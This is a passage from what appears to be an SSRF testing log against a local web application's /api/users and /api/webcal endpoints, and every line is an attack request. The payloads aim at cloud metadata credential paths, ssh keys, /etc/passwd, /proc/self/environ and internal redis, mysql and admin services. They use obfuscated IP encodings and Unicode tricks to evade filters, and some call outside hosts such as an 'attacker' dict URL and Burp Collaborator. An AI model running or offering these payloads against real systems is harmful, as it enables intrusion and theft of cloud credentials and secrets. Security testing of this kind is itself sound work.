`http://localhost:4200/api/users?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=0%2F` +- Testing: `http://localhost:4200/api/users?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/webcal +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/webcal?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/webcal?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/webcal?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/webcal?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=0` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/webcal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/webcal?url=2130706433` +- Testing: `http://localhost:4200/api/webcal?url=017700000001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com.localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/webcal?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/webcal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/webcal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/webcal?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/webcal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/webcal?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/webcal?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=0%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/webcal?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/webcal?url=0` +- Testing: `http://localhost:4200/api/webcal?url=127.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1` +- Testing: `http://localhost:4200/api/webcal?url=localhost` +- Testing: `http://localhost:4200/api/webcal?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/webcal?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/webcal?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/webcal?url=7F000001` +- Testing: `http://localhost:4200/api/webcal?url=2130706433` +- Testing: `http://localhost:4200/api/webcal?url=6425673729` +- Testing: `http://localhost:4200/api/webcal?url=127001` +- Testing: `http://localhost:4200/api/webcal?url=127_0._0_1` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/webcal?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001` +- Testing: `http://localhost:4200/api/webcal?url=017700000001` +- Testing: `http://localhost:4200/api/webcal?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/webcal?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/webcal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/webcal?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/webcal?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254` +- Testing: `http://localhost:4200/api/webcal?url=2852039166` +- Testing: `http://localhost:4200/api/webcal?url=7147006462` +- Testing: `http://localhost:4200/api/webcal?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/webcal?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/webcal?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/webcal?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/webcal?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/webcal?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/webcal?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/webcal?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/webcal?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/webcal?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/webcal?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521` +- Testing: `http://localhost:4200/api/webcal?url=3232235777` +- Testing: `http://localhost:4200/api/webcal?url=425.510.425.510` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=instance-data` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A22` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A443` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/webcal?url=loopback` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A22` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A80` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A443` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/webcal?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/webcal?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/webcal?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/webcal?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/webcal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/webcal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/webcal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%7Bdomain%7D` +- 